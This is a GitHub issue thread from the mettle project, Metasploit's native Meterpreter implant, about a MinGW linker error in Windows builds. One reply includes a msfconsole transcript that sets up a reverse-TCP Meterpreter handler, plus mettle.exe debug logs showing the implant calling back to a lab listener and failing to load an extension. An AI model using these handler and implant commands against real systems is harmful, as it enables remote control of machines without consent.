Failing to build for Windows targets due to libcurl redefinition #208

Open
sempervictus opened this issue Mar 4, 2021 · 4 comments

@sempervictus

Seeing this for i686 and x64:

configure: WARNING: the previous check could not be made default was used
Building curl for x86_64-w64-mingw32
/usr/lib/gcc/x86_64-w64-mingw32/10.2.0/../../../../x86_64-w64-mingw32/bin/ld: ../lib/.libs/libcurl.a(libcurl_la-system_win32.o):system_win32.c:(.bss+0x10): multiple definition of `Curl_freq'; curl-tool_doswin.o:tool_doswin.c:(.bss+0x8): first defined here
/usr/lib/gcc/x86_64-w64-mingw32/10.2.0/../../../../x86_64-w64-mingw32/bin/ld: ../lib/.libs/libcurl.a(libcurl_la-system_win32.o):system_win32.c:(.bss+0x8): multiple definition of `Curl_isVistaOrGreater'; curl-tool_doswin.o:tool_doswin.c:(.bss+0x0): first defined here
collect2: error: ld returned 1 exit status
make[4]: *** [Makefile:933: curl.exe] Error 1
make[3]: *** [Makefile:2000: install-recursive] Error 1
make[2]: *** [Makefile:949: install-recursive] Error 1
make[1]: *** [make/Makefile.curl:30: /.../mettle/build/x86_64-w64-mingw32/lib/libcurl.a] Error 2
make[1]: Leaving directory '/opt/code/Ruby/MSF/mettle'
make: *** [Makefile:33: x86_64-w64-mingw32.build] Error 2

Host system is Arch Linux, though that probably shouldn't have much bearing on this.
Ping @acammack-r7 and @OJ - any thoughts on what I broke this time? :)

@timwr
Contributor

timwr commented Mar 5, 2021

It's building fine for me on Ubuntu 20.04, but the resulting binary doesn't seem to establish a session:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started reverse TCP handler on 192.168.13.37:4444

msf6 exploit(multi/handler) > [*] Meterpreter session 1 opened (192.168.13.37:4444 -> 192.168.13.105:49723) at 2021-03-05 12:16:46 +0000

msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x64/windows               192.168.13.37:4444 -> 192.168.13.105:49723 (192.168.13.105)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > load stdapi
Loading extension stdapi...
[-] Meterpreter session 1 is not valid and will be closed

[*] 192.168.13.105 - Meterpreter session 1 closed.
[*] Meterpreter session 2 opened (192.168.13.37:4444 -> 192.168.13.105:49725) at 2021-03-05 12:17:17 +0000

[-] Failed to load extension: No response was received to the core_enumextcmd request.
msf6 exploit(multi/handler) >

C:\>mettle.exe -u tcp://192.168.13.37:4444 -d 3
[03-05-2021 20:16:45.561s] [tlv.c:497] Registering command 10, cb 0000000000404ecd, arg 0000000000085bc0
[03-05-2021 20:16:45.561s] [tlv.c:497] Registering command 13, cb 0000000000404e7d, arg 0000000000085bc0
[03-05-2021 20:16:45.561s] [tlv.c:497] Registering command 22, cb 0000000000404e1c, arg 0000000000085bc0
[03-05-2021 20:16:45.579s] [tlv.c:497] Registering command 11, cb 0000000000404dd5, arg 0000000000085bc0
[03-05-2021 20:16:45.579s] [tlv.c:497] Registering command 21, cb 0000000000404d6f, arg 0000000000085bc0
[03-05-2021 20:16:45.579s] [tlv.c:497] Registering command 16, cb 0000000000404d30, arg 0000000000085bc0
[03-05-2021 20:16:45.579s] [tlv.c:497] Registering command 12, cb 0000000000404f86, arg 0000000000085bc0
[03-05-2021 20:16:45.611s] [tlv.c:497] Registering command 23, cb 0000000000404d3a, arg 0000000000085bc0
[03-05-2021 20:16:45.611s] [tlv.c:497] Registering command 4, cb 00000000004040e5, arg 0000000000085bc0
[03-05-2021 20:16:45.611s] [tlv.c:497] Registering command 2, cb 0000000000404aed, arg 0000000000085bc0
[03-05-2021 20:16:45.611s] [tlv.c:497] Registering command 6, cb 0000000000404a45, arg 0000000000085bc0
[03-05-2021 20:16:45.638s] [tlv.c:497] Registering command 7, cb 00000000004049b4, arg 0000000000085bc0
[03-05-2021 20:16:45.638s] [tlv.c:497] Registering command 5, cb 00000000004048b0, arg 0000000000085bc0
[03-05-2021 20:16:45.638s] [tlv.c:497] Registering command 8, cb 00000000004047d6, arg 0000000000085bc0
[03-05-2021 20:16:45.656s] [tlv.c:497] Registering command 1, cb 0000000000404769, arg 0000000000085bc0
[03-05-2021 20:16:45.656s] [tlv.c:497] Registering command 3, cb 0000000000404bd0, arg 0000000000085bc0
[03-05-2021 20:16:45.656s] [tlv.c:497] Registering command 1001, cb 000000000040c48e, arg 0000000000085bc0
[03-05-2021 20:16:45.656s] [tlv.c:497] Registering command 1004, cb 000000000040d18f, arg 0000000000085bc0
[03-05-2021 20:16:45.689s] [tlv.c:497] Registering command 1006, cb 000000000040d301, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1007, cb 000000000040d086, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1005, cb 000000000040a7ae, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1002, cb 000000000040c52e, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1008, cb 000000000040c4d3, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1011, cb 000000000040d1dc, arg 0000000000085bc0
[03-05-2021 20:16:45.703s] [tlv.c:497] Registering command 1003, cb 000000000040d0f5, arg 0000000000085bc0
[03-05-2021 20:16:45.736s] [tlv.c:497] Registering command 1009, cb 000000000040c42d, arg 0000000000085bc0
[03-05-2021 20:16:45.736s] [tlv.c:497] Registering command 1014, cb 000000000040a695, arg 0000000000085bc0
[03-05-2021 20:16:45.736s] [tlv.c:497] Registering command 1016, cb 000000000040d142, arg 0000000000085bc0
[03-05-2021 20:16:45.736s] [tlv.c:497] Registering command 1010, cb 000000000040a7cd, arg 0000000000085bc0
[03-05-2021 20:16:45.767s] [tlv.c:497] Registering command 1015, cb 000000000040a7ec, arg 0000000000085bc0
[03-05-2021 20:16:45.767s] [tlv.c:497] Registering command 1026, cb 000000000040ccf5, arg 0000000000085bc0
[03-05-2021 20:16:45.767s] [tlv.c:497] Registering command 1019, cb 000000000040adf4, arg 0000000000085bc0
[03-05-2021 20:16:45.767s] [tlv.c:497] Registering command 1022, cb 000000000040b109, arg 0000000000085bc0
[03-05-2021 20:16:45.798s] [tlv.c:497] Registering command 1017, cb 000000000040b2dd, arg 0000000000085bc0
[03-05-2021 20:16:45.798s] [tlv.c:497] Registering command 1023, cb 000000000040b301, arg 0000000000085bc0
[03-05-2021 20:16:45.798s] [tlv.c:497] Registering command 1018, cb 000000000040b14b, arg 0000000000085bc0
[03-05-2021 20:16:45.798s] [tlv.c:497] Registering command 1021, cb 000000000040b328, arg 0000000000085bc0
[03-05-2021 20:16:45.798s] [tlv.c:497] Registering command 1020, cb 000000000040a80b, arg 0000000000085bc0
[03-05-2021 20:16:45.829s] [tlv.c:497] Registering command 1024, cb 000000000040a82a, arg 0000000000085bc0
[03-05-2021 20:16:45.829s] [tlv.c:497] Registering command 1025, cb 000000000040d067, arg 0000000000085bc0
[03-05-2021 20:16:45.829s] [tlv.c:497] Registering command 1052, cb 000000000040bc26, arg 0000000000085bc0
[03-05-2021 20:16:45.829s] [tlv.c:497] Registering command 1055, cb 000000000040a680, arg 0000000000085bc0
[03-05-2021 20:16:45.861s] [tlv.c:497] Registering command 1059, cb 000000000040bd19, arg 0000000000085bc0
[03-05-2021 20:16:45.874s] [tlv.c:497] Registering command 1056, cb 000000000040a687, arg 0000000000085bc0
[03-05-2021 20:16:45.874s] [tlv.c:497] Registering command 1071, cb 000000000040bf7e, arg 0000000000085bc0
[03-05-2021 20:16:45.874s] [tlv.c:497] Registering command 1067, cb 000000000040a689, arg 0000000000085bc0
[03-05-2021 20:16:45.890s] [tlv.c:497] Registering command 1068, cb 000000000040ce68, arg 0000000000085bc0
[03-05-2021 20:16:45.890s] [tlv.c:497] Registering command 1069, cb 000000000040c0d8, arg 0000000000085bc0
[03-05-2021 20:16:45.890s] [tlv.c:497] Registering command 1077, cb 000000000040d283, arg 0000000000085bc0
[03-05-2021 20:16:45.890s] [tlv.c:497] Registering command 1071, cb 000000000040bf7e, arg 0000000000085bc0
[03-05-2021 20:16:45.890s] [tlv.c:497] Registering command 1072, cb 000000000040c056, arg 0000000000085bc0
[03-05-2021 20:16:45.924s] [tlv.c:497] Registering command 1070, cb 000000000040d230, arg 0000000000085bc0
[03-05-2021 20:16:45.937s] [tlv.c:497] Registering command 1095, cb 000000000040a693, arg 0000000000085bc0
[03-05-2021 20:16:45.947s] [mettle.c:75] Heartbeat
[03-05-2021 20:16:45.965s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-05-2021 20:16:45.965s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-05-2021 20:16:45.965s] [network_client.c:278] connected to 'tcp://192.168.13.37:4444'
[03-05-2021 20:16:46.325s] [tlv.c:524] handler for 16: 0000000002b70e00
[03-05-2021 20:16:46.325s] [tlv.c:565] processing command: 16 id: '50779909960228443000110991293709'
[03-05-2021 20:16:50.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:16:55.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:00.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:05.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:10.498s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:13.778s] [tlv.c:524] handler for 10: 0000000002b70570
[03-05-2021 20:17:13.794s] [tlv.c:565] processing command: 10 id: '99689937435509362402246444782967'
[03-05-2021 20:17:15.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:16.966s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-05-2021 20:17:16.986s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-05-2021 20:17:16.999s] [network_client.c:278] connected to 'tcp://192.168.13.37:4444'
[03-05-2021 20:17:17.262s] [tlv.c:524] handler for 16: 0000000002b70e00
[03-05-2021 20:17:17.279s] [tlv.c:565] processing command: 16 id: '95808409062909733036113808451481'
[03-05-2021 20:17:20.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:25.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:30.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:35.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:40.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:45.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:47.966s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-05-2021 20:17:47.986s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-05-2021 20:17:47.999s] [network_client.c:278] connected to 'tcp://192.168.13.37:4444'
[03-05-2021 20:17:48.278s] [tlv.c:524] handler for 16: 0000000002b70e00
[03-05-2021 20:17:48.278s] [tlv.c:565] processing command: 16 id: '56847072888345645143823264150498'
[03-05-2021 20:17:50.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:17:55.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:00.498s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:05.513s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:10.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:15.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:18.966s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-05-2021 20:18:19.001s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-05-2021 20:18:19.001s] [network_client.c:278] connected to 'tcp://192.168.13.37:4444'
[03-05-2021 20:18:19.278s] [tlv.c:524] handler for 16: 0000000002b70e00
[03-05-2021 20:18:19.278s] [tlv.c:565] processing command: 16 id: '48703818332960116459090654277147'
[03-05-2021 20:18:20.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:25.512s] [mettle.c:75] Heartbeat
[03-05-2021 20:18:30.513s] [mettle.c:75] Heartbeat

@sempervictus
Author

@timwr: Long time, buddy, thanks for picking this up.
If we're seeing different errors on different OS, does this mean we've picked up build-system dependencies? MUSL stack was supposed to keep us immunized (I thought) from that sort of pollution.
I'll try building in an Ubuntu nspawn and see what I get, but if we are getting deltas per-host, might be worthwhile to figure out where those interfaces are.

For your connection issue, can you instrument the MSF-side TLV handler to log-out? I'm curious what it's getting from the Windows side to cause that. I saw stuff like that most recently with TLVCrypt testing for OJ, but would need to see what the Ruby side thinks of the TLVs (or bitgarbage) it's getting from the final stage loaded.

@acammack-r7
Contributor

Yeah, the MinGW stuff was never really more than a PoC and it's not surprising we can't handle GCC 10. I think session type would need to be a Linux stageless meterp to get anything going. Windows native meterp behaves very differently from mingw mettle.

@acammack-r7
Contributor

If you need to get it building and don't care about MinGW (Metasploit doesn't use those payloads anywhere), you can remove those triples from the ARCHES file to no ill effect (it's what I do). The way Debian/Ubuntu does their mingw packaging is quite different to Arch, and I've had plenty of issues around that in the past.
